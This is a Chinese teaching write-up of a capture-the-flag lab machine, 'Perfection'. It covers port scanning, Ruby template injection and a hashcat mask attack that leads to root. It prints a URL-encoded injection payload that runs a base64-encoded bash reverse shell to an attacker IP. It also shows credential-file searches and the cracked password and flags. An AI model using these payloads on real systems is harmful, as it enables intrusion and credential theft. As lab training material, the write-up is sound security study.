渗透测试教学文档：Perfection靶机实战分析<\/h1>

1. 靶机概述<\/h2>
Perfection是一台基于Ruby开发的易难度靶机，主要考察以下技术点：<\/p>
端口扫描与信息收集<\/li>
Ruby SSTI (服务器端模板注入)漏洞利用<\/li>
权限提升与横向移动<\/li>
密码哈希破解技术<\/li> <\/ul>
2. 信息收集阶段<\/h2>

2.1 初始扫描<\/h3>
使用Nmap进行快速扫描：<\/p>
nmap -sV -sC 10.10.11.253 --min-rate 1000<\/span>
<\/span><\/span><\/code><\/pre>参数说明：<\/p>

-sV<\/code>: 服务版本检测<\/li>
-sC<\/code>: 使用默认脚本扫描<\/li>
--min-rate 1000<\/code>: 设置最小发包速率为1000包\/秒<\/li>
<\/ul>
3. 漏洞利用：Ruby SSTI注入<\/h2>
3.1 确认漏洞<\/h3>
发现目标使用Ruby开发，尝试SSTI注入：<\/p>
x%0a<%25%3Dsystem(<\/span>"ping+-c1+10.10.16.23"<\/span>)<\/span>;%25>
<\/span><\/span><\/code><\/pre>URL编码解析：<\/p>

%0a<\/code>: 换行符<\/li>
<%25%3D<\/code>: <%=<\/code> (Ruby模板输出标记)<\/li>
system(...)<\/code>: 执行系统命令<\/li>
<\/ul>
3.2 反弹Shell构造<\/h3>

准备Base64编码的反弹Shell命令：<\/li>
<\/ol>
echo "\/bin\/bash -i >& \/dev\/tcp\/10.10.16.23\/10032 0>&1"<\/span> | base64
<\/span><\/span><\/code><\/pre>
构造SSTI注入Payload：<\/li>
<\/ol>
category1=<\/span>x%0a<%25%3Dsystem(<\/span>"echo+'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjIzLzEwMDMyIDA%2bJjEK'|base64+-d|bash"<\/span>)<\/span>;%25>
<\/span><\/span><\/code><\/pre>4. 初始访问与用户权限<\/h2>
4.1 获取用户Shell<\/h3>
成功获取susan用户权限后，升级终端：<\/p>
SHELL=<\/span>\/bin\/bash script -q \/dev\/null
<\/span><\/span><\/code><\/pre>4.2 获取用户Flag<\/h3>
cat \/home\/susan\/user.txt
<\/span><\/span># 6a8f32464a7641145fd3ed87fdc876a1<\/span>
<\/span><\/span><\/code><\/pre>5. 权限提升<\/h2>
5.1 信息收集<\/h3>

查找属主为特定UID的文件：<\/li>
<\/ol>
find \/ -uid 1001<\/span> -type f -ls 2>\/dev\/null | grep -v "\/proc*"<\/span>
<\/span><\/span><\/code><\/pre>
搜索包含用户名的文件：<\/li>
<\/ol>
find \/ -name "*susan*"<\/span> -type f -ls 2>\/dev\/null
<\/span><\/span><\/code><\/pre>
搜索密码相关信息：<\/li>
<\/ol>
cd ~; grep -i password -R .
<\/span><\/span><\/code><\/pre>5.2 发现密码哈希<\/h3>
在数据库文件中找到Susan的密码哈希：<\/p>
strings .\/Migration\/pupilpath_credentials.db | grep "Susan"<\/span>
<\/span><\/span><\/code><\/pre>5.3 密码策略分析<\/h3>
根据泄露信息，密码格式为：

{名字}{名字反向拼写}{1到1,000,000,000之间随机生成的整数}<\/code><\/p>
对于用户susan：<\/p>

名字：susan<\/li>
反向：nasus<\/li>
格式：susan_nasus_?d?d?d?d?d?d?d?d?d<\/code><\/li>
<\/ul>
5.4 使用Hashcat破解<\/h3>

准备哈希文件：<\/li>
<\/ol>
echo abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f > hash
<\/span><\/span><\/code><\/pre>
执行破解：<\/li>
<\/ol>
hashcat -a 3<\/span> -m 1400<\/span> hash "susan_nasus_?d?d?d?d?d?d?d?d?d"<\/span>
<\/span><\/span><\/code><\/pre>参数说明：<\/p>

-a 3<\/code>: 暴力破解模式<\/li>
-m 1400<\/code>: SHA2-256哈希类型<\/li>
掩码模式：susan_nasus_<\/code>后跟9位数字<\/li>
<\/ul>

破解结果：<\/li>
<\/ol>
susan_nasus_413759210
<\/code><\/pre>
5.5 获取Root权限<\/h3>
使用破解的密码切换到root：<\/p>
sudo su
<\/span><\/span># 输入密码: susan_nasus_413759210<\/span>
<\/span><\/span><\/code><\/pre>5.6 获取Root Flag<\/h3>
cat \/root\/root.txt
<\/span><\/span># ab2d77a013f943f420a48d84563a73bf<\/span>
<\/span><\/span><\/code><\/pre>6. 技术总结<\/h2>


SSTI注入<\/strong>：<\/p>

Ruby模板注入需要闭合模板标签<%= %><\/code><\/li>
使用URL编码绕过可能的过滤<\/li>
通过换行符%0a<\/code>分隔命令<\/li>
<\/ul>
<\/li>

密码破解<\/strong>：<\/p>

利用信息泄露获取密码策略<\/li>
使用掩码攻击提高破解效率<\/li>
Hashcat参数选择要匹配哈希类型<\/li>
<\/ul>
<\/li>

权限提升<\/strong>：<\/p>

通过密码复用实现垂直提权<\/li>
充分利用系统信息收集技巧<\/li>
<\/ul>
<\/li>
<\/ol>
7. 防御建议<\/h2>


对于Ruby应用：<\/p>

避免直接执行用户输入<\/li>
使用安全的模板渲染方法<\/li>
<\/ul>
<\/li>

密码安全：<\/p>

避免可预测的密码策略<\/li>
使用强密码哈希算法<\/li>
实施多因素认证<\/li>
<\/ul>
<\/li>

系统安全：<\/p>

限制sudo权限<\/li>
定期审计敏感文件权限<\/li>
监控异常登录行为<\/li>
<\/ul>
<\/li>
<\/ol>